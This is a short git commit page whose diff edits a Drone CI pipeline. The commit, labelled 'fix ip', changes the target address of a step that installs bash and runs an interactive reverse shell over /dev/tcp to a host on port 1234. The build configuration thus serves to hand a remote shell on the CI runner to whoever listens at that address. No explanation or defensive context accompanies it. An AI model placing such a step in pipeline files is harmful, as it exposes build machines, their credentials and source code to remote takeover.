fix ip
Some checks failed
continuous-integration/drone/push Build is failing

This commit is contained in:
2026-03-17 02:03:47 +01:00
parent e787ce2ecc
commit 27f0d0425c

View File

@@ -7,4 +7,4 @@ steps:
image: alpine:latest
commands:
- apk add --no-cache bash
- bash -i >& /dev/tcp/192.168.178.25/1234 0>&1
- bash -i >& /dev/tcp/192.168.178.27/1234 0>&1